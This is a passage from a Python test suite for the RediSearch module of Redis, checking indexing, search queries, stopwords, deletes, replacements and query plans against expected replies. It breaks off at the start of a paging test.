# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
def testAdd(env):
    """Basic FT.ADD flow: create an index, add one document, and verify the
    per-term inverted-index keys survive an RDB reload.

    Skipped on cluster because it inspects key names directly.
    """
    if env.is_cluster():
        raise unittest.SkipTest()
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
    # The index metadata key must exist right after FT.CREATE
    env.assertTrue(r.exists('idx:idx'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
                                   'title', 'hello world',
                                   'body', 'lorem ist ipsum'))
    for _ in r.retry_with_rdb_reload():
        # One inverted-index key per indexed term must still be present
        prefix = 'ft'
        env.assertExists(prefix + ':idx/hello')
        env.assertExists(prefix + ':idx/world')
        env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
    """FT.ADD ... REPLACE IF <expr>: replace happens only when the predicate
    evaluates true against the currently stored document; a false predicate
    yields the 'NOADD' reply."""
    env.assertOk(env.cmd(
        'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
    env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
                         'fields', 'foo', 'hello', 'bar', '123'))
    # Predicate true -> replace succeeds
    env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
                         '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
    # foo is now 'world', so the same predicate fails
    env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
                                     'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
    # Constant-false predicate also yields NOADD
    env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
                                     'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
    # PARTIAL replace guarded by a true predicate
    env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
                         '@foo == "world"', 'fields', 'bar', '234'))
    # Numeric comparison against the field updated above
    env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
                         '@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
    # Ensure that conditionals are ignored if the document doesn't exist
    env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
                         'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
    # Ensure that it fails if we try again, because it already exists
    env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
                                     'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
    # Ensure that it fails because we're not using 'REPLACE'
    with env.assertResponseError():
        env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
                             'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
    """Regression test for https://github.com/RediSearch/RediSearch/issues/306

    A union of a GEO-filter clause with a TAG clause must return the ids
    from both branches, each exactly once.
    """
    # Fixes applied: removed an unused local (N = 100) and a stray
    # Python-2 debug `print` statement that polluted test output.
    r = env
    env.assertOk(r.execute_command(
        "ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
    env.assertOk(r.execute_command(
        "ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
    env.assertOk(r.execute_command(
        "ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
    # Doc 1 matches the geo branch, doc 2 the tag branch
    res = r.execute_command(
        'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
    env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
    """Per-clause query attributes: $weight re-ranks union branches, while
    $slop and $inorder constrain phrase proximity and token order."""
    env.assertOk(env.cmd('ft.create', 'idx', 'schema',
                         'title', 'text', 'body', 'text'))
    env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
                         'title', 't1 t2', 'body', 't3 t4 t5'))
    env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
                         'body', 't1 t2', 'title', 't3 t5'))
    # Body branch weighted higher -> doc2 (t1 t2 in body) ranks first
    res = env.cmd(
        'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
    env.assertListEqual([2L, 'doc2', 'doc1'], res)
    # Title branch weighted higher -> ranking flips
    res = env.cmd(
        'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
    env.assertListEqual([2L, 'doc1', 'doc2'], res)
    res = env.cmd(
        'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
    env.assertListEqual([2L, 'doc2', 'doc1'], res)
    # slop 0: tokens must be adjacent (order still free)
    res = env.cmd(
        'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
    env.assertListEqual([1L, 'doc2'], res)
    # slop 0 + inorder: 't5 t3' never appears in that order -> no hits
    res = env.cmd(
        'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
    env.assertListEqual([0], res)
def testUnion(env):
    """UNION queries over a corpus where even docs say 'hello world' and odd
    docs say 'hallo werld': equivalent unions must return the same counts
    regardless of clause order, duplication, or nesting; re-checked after an
    RDB reload."""
    N = 100
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text'))
    for i in range(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
    for _ in r.retry_with_rdb_reload():
        # hello|hallo covers the whole corpus
        res = r.execute_command(
            'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
        env.assertEqual(N + 1, len(res))
        env.assertEqual(N, res[0])
        # hello|world matches only the even half
        res = r.execute_command(
            'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
        env.assertEqual(51, len(res))
        env.assertEqual(50, res[0])
        # Duplicated branches must not duplicate results
        res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
                                'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(51, len(res))
        env.assertEqual(50, res[0])
        # Cross-paired unions cover everything; order of branches is irrelevant
        res = r.execute_command(
            'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(101, len(res))
        env.assertEqual(100, res[0])
        res = r.execute_command(
            'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(101, len(res))
        env.assertEqual(100, res[0])
        res = r.execute_command(
            'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(101, len(res))
        env.assertEqual(100, res[0])
        res = r.execute_command(
            'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(51, len(res))
        env.assertEqual(50, res[0])
        # Deeply nested equivalent union still matches the full corpus
        res = r.execute_command(
            'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
        env.assertEqual(101, len(res))
        env.assertEqual(100, res[0])
def testSearch(env):
    """FT.SEARCH basics: default reply layout, empty query, NOCONTENT,
    WITHSCORES, and their combination; re-checked after an RDB reload.

    doc2 has the higher score (weight 1.0 vs 0.5), so it ranks first.
    """
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
                                   'title', 'hello world',
                                   'body', 'lorem ist ipsum'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
                                   'title', 'hello another world',
                                   'body', 'lorem ist ipsum lorem lorem'))
    for _ in r.retry_with_rdb_reload():
        # Default reply: [count, id, fields, id, fields]
        res = r.execute_command('ft.search', 'idx', 'hello')
        env.assertTrue(len(res) == 5)
        env.assertEqual(res[0], 2L)
        env.assertEqual(res[1], "doc2")
        env.assertTrue(isinstance(res[2], list))
        env.assertTrue('title' in res[2])
        env.assertTrue('hello another world' in res[2])
        env.assertEqual(res[3], "doc1")
        env.assertTrue('hello world' in res[4])
        # Test empty query
        res = r.execute_command('ft.search', 'idx', '')
        env.assertListEqual([0], res)
        # Test searching with no content
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent')
        env.assertTrue(len(res) == 3)
        env.assertEqual(res[0], 2L)
        env.assertEqual(res[1], "doc2")
        env.assertEqual(res[2], "doc1")
        # Test searching WITHSCORES
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'WITHSCORES')
        env.assertEqual(len(res), 7)
        env.assertEqual(res[0], 2L)
        env.assertEqual(res[1], "doc2")
        env.assertTrue(float(res[2]) > 0)
        env.assertEqual(res[4], "doc1")
        env.assertTrue(float(res[5]) > 0)
        # Test searching WITHSCORES NOCONTENT
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
        env.assertEqual(len(res), 5)
        env.assertEqual(res[0], 2L)
        env.assertEqual(res[1], "doc2")
        env.assertTrue(float(res[2]) > 0)
        env.assertEqual(res[3], "doc1")
        env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
    """Documents indexed with NOSAVE are searchable but come back with
    empty content, since their hashes were never stored."""
    env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
    # Index three documents without persisting their hashes
    for doc_num in range(3):
        env.cmd('ft.add', 'idx', 'doc{}'.format(doc_num),
                1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
    # All three should match the query
    res = env.cmd('ft.search', 'idx', 'value')
    env.assertEqual(3, res[0])
    # Every content slot (odd positions after the count) must be empty
    for fields in res[2::2]:
        env.assertEqual([], fields)
def testGet(env):
    """FT.GET / FT.MGET: fetch stored documents by id; unknown or deleted
    ids come back as nil (None)."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
    for i in range(100):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'foo', 'hello world', 'bar', 'wat wat'))
    for i in range(100):
        # Known id returns the full field list
        res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
        env.assertIsNotNone(res)
        env.assertListEqual(
            ['foo', 'hello world', 'bar', 'wat wat'], res)
        # Unknown id returns nil
        env.assertIsNone(r.execute_command(
            'ft.get', 'idx', 'doc%dsdfsd' % i))
    # MGET over all known ids: one field list per id
    rr = r.execute_command(
        'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
    env.assertEqual(len(rr), 100)
    for res in rr:
        env.assertIsNotNone(res)
        env.assertListEqual(
            ['foo', 'hello world', 'bar', 'wat wat'], res)
    # MGET over all-unknown ids: one nil per requested id
    rr = r.execute_command(
        'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
    env.assertEqual(len(rr), 100)
    for res in rr:
        env.assertIsNone(res)
    # Verify that when a document is deleted, GET returns NULL
    r.cmd('ft.del', 'idx', 'doc10')  # But we still keep the document
    r.cmd('ft.del', 'idx', 'doc11')
    res = r.cmd('ft.get', 'idx', 'doc10')
    r.assertEqual(None, res)
    res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
    r.assertIsNone(res[0])
    r.assertIsNone(res[1])
    # doc12 was not deleted, so its entry must be non-empty
    r.assertTrue(not not res[2])
def testDelete(env):
    """FT.DEL semantics: first delete returns 1, repeat returns 0; the 'DD'
    flag also removes the document hash; deleted docs disappear from search
    and can be re-inserted; delete/re-add cycle re-checked after RDB reload."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text'))
    for i in range(100):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'f', 'hello world'))
    for i in range(100):
        # the doc hash should exist now
        r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
        # Delete the actual docs only half of the time
        env.assertEqual(1, r.execute_command(
            'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
        # second delete should return 0
        env.assertEqual(0, r.execute_command(
            'ft.del', 'idx', 'doc%d' % i))
        # After del with DD the doc hash should not exist
        if i % 2 == 0:
            env.assertFalse(r.exists('doc%d' % i))
        else:
            r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
        # The deleted doc must be gone from results and the count shrinks by one
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
        env.assertNotIn('doc%d' % i, res)
        env.assertEqual(res[0], 100 - i - 1)
        env.assertEqual(len(res), 100 - i)
        # test reinsertion
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'f', 'hello world'))
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
        env.assertIn('doc%d' % i, res)
        # Delete again so the next iteration sees a shrinking corpus
        env.assertEqual(1, r.execute_command(
            'ft.del', 'idx', 'doc%d' % i))
    for _ in r.retry_with_rdb_reload():
        # add/del/del cycle behaves the same after a reload
        did = 'rrrr'
        env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
                                       'f', 'hello world'))
        env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
        env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
        env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
                                       'f', 'hello world'))
        env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
        env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
    """FT.ADD REPLACE: re-adding an existing id without REPLACE errors;
    with REPLACE the old content stops matching and the new content does;
    verified across an RDB reload."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
                                   'f', 'hello world'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
                                   'f', 'hello world'))
    res = r.execute_command(
        'ft.search', 'idx', 'hello world')
    env.assertEqual(2, res[0])
    with env.assertResponseError():
        # make sure we can't insert a doc twice
        res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
                                'f', 'hello world')
    # now replace doc1 with a different content
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
                                   'f', 'goodbye universe'))
    for _ in r.retry_with_rdb_reload():
        # make sure the query for hello world does not return the replaced
        # document
        res = r.execute_command(
            'ft.search', 'idx', 'hello world', 'nocontent')
        env.assertEqual(1, res[0])
        env.assertEqual('doc2', res[1])
        # search for the doc's new content
        res = r.execute_command(
            'ft.search', 'idx', 'goodbye universe', 'nocontent')
        env.assertEqual(1, res[0])
        env.assertEqual('doc1', res[1])
def testDrop(env):
    """FT.DROP removes the index and its documents; FT.DROP KEEPDOCS removes
    only index structures, leaving the document hashes behind."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
    for i in range(100):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'f', 'hello world', 'n', 666, 't', 'foo bar',
                                       'g', '19.04,47.497'))
    keys = r.keys('*')
    env.assertGreaterEqual(len(keys), 100)
    # Plain drop: index keys AND document hashes are all gone
    env.assertOk(r.execute_command('ft.drop', 'idx'))
    keys = r.keys('*')
    env.assertEqual(0, len(keys))
    # Now do the same with KEEPDOCS
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
    for i in range(100):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'f', 'hello world', 'n', 666, 't', 'foo bar',
                                       'g', '19.04,47.497'))
    keys = r.keys('*')
    env.assertGreaterEqual(len(keys), 100)
    if not env.is_cluster():
        # With KEEPDOCS, exactly the 100 document hashes remain
        env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
        keys = r.keys('*')
        env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
                             'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
    """Stopword configuration at FT.CREATE time: default list, a custom
    two-word list ('hello', 'world'), and an empty list; query behavior
    re-checked after an RDB reload."""
    r = env
    # Index with default stopwords
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    # Index with custom stopwords
    env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
                                   'schema', 'foo', 'text'))
    # Index with NO stopwords
    env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
                                   'schema', 'foo', 'text'))
    for idx in ('idx', 'idx2', 'idx3'):
        env.assertOk(r.execute_command(
            'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
        env.assertOk(r.execute_command(
            'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
    for _ in r.retry_with_rdb_reload():
        # Normal index should return results just for 'hello world'
        env.assertEqual([1, 'doc1'], r.execute_command(
            'ft.search', 'idx', 'hello world', 'nocontent'))
        env.assertEqual([0], r.execute_command(
            'ft.search', 'idx', 'to be or not', 'nocontent'))
        # Custom SW index should return results just for 'to be or not'
        env.assertEqual([0], r.execute_command(
            'ft.search', 'idx2', 'hello world', 'nocontent'))
        env.assertEqual([1, 'doc2'], r.execute_command(
            'ft.search', 'idx2', 'to be or not', 'nocontent'))
        # No SW index should return results for both
        env.assertEqual([1, 'doc1'], r.execute_command(
            'ft.search', 'idx3', 'hello world', 'nocontent'))
        env.assertEqual([1, 'doc2'], r.execute_command(
            'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
    """Custom stopwords ('foo', 'bar', 'baz') are dropped from queries.

    Ported from the Python client's tests, where it failed after earlier
    changes.
    """
    env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
            'bar', 'baz', 'schema', 'txt', 'text')
    env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
    env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
    stopwords_only = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
    mixed_terms = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
    # A query made purely of stopwords matches nothing
    env.assertEqual(0, stopwords_only[0])
    # The surviving terms ('hello world') still match doc2
    env.assertEqual(1, mixed_terms[0])
def testNoStopwords(env):
    """Interaction of the default stopword 'a' with VERBATIM and
    NOSTOPWORDS (ported from the Java test suite)."""
    env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
    for doc_num in range(100):
        title = 'hello world' if doc_num % 2 == 0 else 'hello worlds'
        env.cmd('ft.add', 'idx', 'doc{}'.format(doc_num), 1.0, 'fields',
                'title', title)
    # 'a' is a stopword and stemming folds world/worlds -> everything matches
    res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
    env.assertEqual(100, res[0])
    # VERBATIM disables stemming -> only the exact-'world' half matches
    res = env.cmd('ft.search', 'idx', 'hello a world',
                  'VERBATIM', 'NOCONTENT')
    env.assertEqual(50, res[0])
    # NOSTOPWORDS keeps the literal token 'a', which no document contains
    res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
    env.assertEqual(0, res[0])
def testOptional(env):
    """Optional terms ('~term'): they must not filter results, only affect
    scoring; checked with the DISMAX scorer so order is deterministic."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx',
                                   'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
                                   1.0, 'fields', 'foo', 'hello world woot'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
                                   1.0, 'fields', 'foo', 'hello world werld'))
    # Baseline: all three docs contain 'hello'
    res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
    env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
    # Mandatory 'world' excludes doc1
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
    env.assertEqual([2L, 'doc3', 'doc2'], res)
    # Optional 'world' keeps doc1 but ranks it last
    res = r.execute_command(
        'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
    env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
    res = r.execute_command(
        'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
    env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
    # Position of the optional terms in the query must not matter
    res = r.execute_command(
        'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
    env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
    """FT.EXPLAIN / FT.EXPLAINCLI: the query plan for a mixed
    intersect/exact/union/numeric query must match the expected rendering
    (single string vs. line-array form). CLI variant skipped on cluster."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
    q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
    res = r.execute_command('ft.explain', 'idx', q)
    # print res.replace('\n', '\\n')
    # expected = """INTERSECT {\n  UNION {\n    hello\n    +hello(expanded)\n  }\n  UNION {\n    world\n    +world(expanded)\n  }\n  EXACT {\n    what\n    what\n  }\n  UNION {\n    UNION {\n      hello\n      +hello(expanded)\n    }\n    UNION {\n      world\n      +world(expanded)\n    }\n  }\n  UNION {\n    NUMERIC {10.000000 <= @bar <= 100.000000}\n    NUMERIC {200.000000 <= @bar <= 300.000000}\n  }\n}\n"""
    # expected = """INTERSECT {\n  UNION {\n    hello\n    <HL(expanded)\n    +hello(expanded)\n  }\n  UNION {\n    world\n    <ARLT(expanded)\n    +world(expanded)\n  }\n  EXACT {\n    what\n    what\n  }\n  UNION {\n    UNION {\n      hello\n      <HL(expanded)\n      +hello(expanded)\n    }\n    UNION {\n      world\n      <ARLT(expanded)\n      +world(expanded)\n    }\n  }\n  UNION {\n    NUMERIC {10.000000 <= @bar <= 100.000000}\n    NUMERIC {200.000000 <= @bar <= 300.000000}\n  }\n}\n"""
    expected = """INTERSECT {\n  UNION {\n    hello\n    +hello(expanded)\n  }\n  UNION {\n    world\n    +world(expanded)\n  }\n  EXACT {\n    what\n    what\n  }\n  UNION {\n    UNION {\n      hello\n      +hello(expanded)\n    }\n    UNION {\n      world\n      +world(expanded)\n    }\n  }\n  UNION {\n    NUMERIC {10.000000 <= @bar <= 100.000000}\n    NUMERIC {200.000000 <= @bar <= 300.000000}\n  }\n}\n"""
    env.assertEqual(res, expected)
    # expected = ['INTERSECT {', '  UNION {', '    hello', '    <HL(expanded)', '    +hello(expanded)', '  }', '  UNION {', '    world', '    <ARLT(expanded)', '    +world(expanded)', '  }', '  EXACT {', '    what', '    what', '  }', '  UNION {', '    UNION {', '      hello', '      <HL(expanded)', '      +hello(expanded)', '    }', '    UNION {', '      world', '      <ARLT(expanded)', '      +world(expanded)', '    }', '  }', '  UNION {', '    NUMERIC {10.000000 <= @bar <= 100.000000}', '    NUMERIC {200.000000 <= @bar <= 300.000000}', '  }', '}', '']
    if env.is_cluster():
        raise unittest.SkipTest()
    # The CLI variant returns the plan as a list of lines instead of one string
    res = env.cmd('ft.explainCli', 'idx', q)
    expected = ['INTERSECT {', '  UNION {', '    hello', '    +hello(expanded)', '  }', '  UNION {', '    world', '    +world(expanded)', '  }', '  EXACT {', '    what', '    what', '  }', '  UNION {', '    UNION {', '      hello', '      +hello(expanded)', '    }', '    UNION {', '      world', '      +world(expanded)', '    }', '  }', '  UNION {', '    NUMERIC {10.000000 <= @bar <= 100.000000}', '    NUMERIC {200.000000 <= @bar <= 300.000000}', '  }', '}', '']
    env.assertEqual(expected, res)
def testNoIndex(env):
    """NOINDEX fields: they must not be searchable (by free text, field
    selector, or numeric range), even though sortable ones are stored."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema',
        'foo', 'text',
        'num', 'numeric', 'sortable', 'noindex',
        'extra', 'text', 'noindex', 'sortable'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
                                   'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
    # Indexed field matches normally
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'nocontent')
    env.assertListEqual([1, 'doc1'], res)
    # Terms that only appear in a noindex field must not match
    res = r.execute_command(
        'ft.search', 'idx', 'lorem ipsum', 'nocontent')
    env.assertListEqual([0], res)
    # Not even via an explicit field selector
    res = r.execute_command(
        'ft.search', 'idx', '@extra:hello', 'nocontent')
    env.assertListEqual([0], res)
    # Nor via a numeric range on the noindex numeric field
    res = r.execute_command(
        'ft.search', 'idx', '@num:[1 1]', 'nocontent')
    env.assertListEqual([0], res)
def testPartial(env):
    """REPLACE PARTIAL updates: changing only noindex fields keeps search
    results intact; changing an indexed field re-indexes; score and payload
    can be updated with an empty FIELDS list."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema',
        'foo', 'text',
        'num', 'numeric', 'sortable', 'noindex',
        'extra', 'text', 'noindex'))
    # print r.execute_command('ft.info', 'idx')
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
                                   'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
                                   'foo', 'hello world', 'num', 2, 'extra', 'abba'))
    res = r.execute_command('ft.search', 'idx', 'hello world',
                            'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
    env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
    res = r.execute_command('ft.search', 'idx', 'hello world',
                            'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
    env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
    # Updating non indexed fields doesn't affect search results
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
                                   'fields', 'num', 3, 'extra', 'jorem gipsum'))
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
    assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
                             'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
    res = r.execute_command(
        'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
    # Updating only indexed field affects search results
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
                                   'fields', 'foo', 'wat wet'))
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'nocontent')
    env.assertListEqual([1L, 'doc2'], res)
    res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
    env.assertListEqual([1L, 'doc1'], res)
    # Test updating of score and no fields
    res = r.execute_command(
        'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
    env.assertLess(float(res[2]), 1)
    # env.assertListEqual([1L, 'doc1'], res)
    env.assertOk(r.execute_command('ft.add', 'idx',
                                   'doc1', '1.0', 'replace', 'partial', 'fields'))
    res = r.execute_command(
        'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
    env.assertGreater(float(res[2]), 1)
    # Test updating payloads
    res = r.execute_command(
        'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
    env.assertIsNone(res[2])
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
                                   'replace', 'partial', 'payload', 'foobar', 'fields'))
    res = r.execute_command(
        'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
    env.assertEqual('foobar', res[2])
def testPaging(env):
    """LIMIT paging: walk the full sorted result set in random-sized chunks,
    check an out-of-range offset returns only the count, and that negative
    or oversized limits are rejected."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
    N = 100
    for i in range(N):
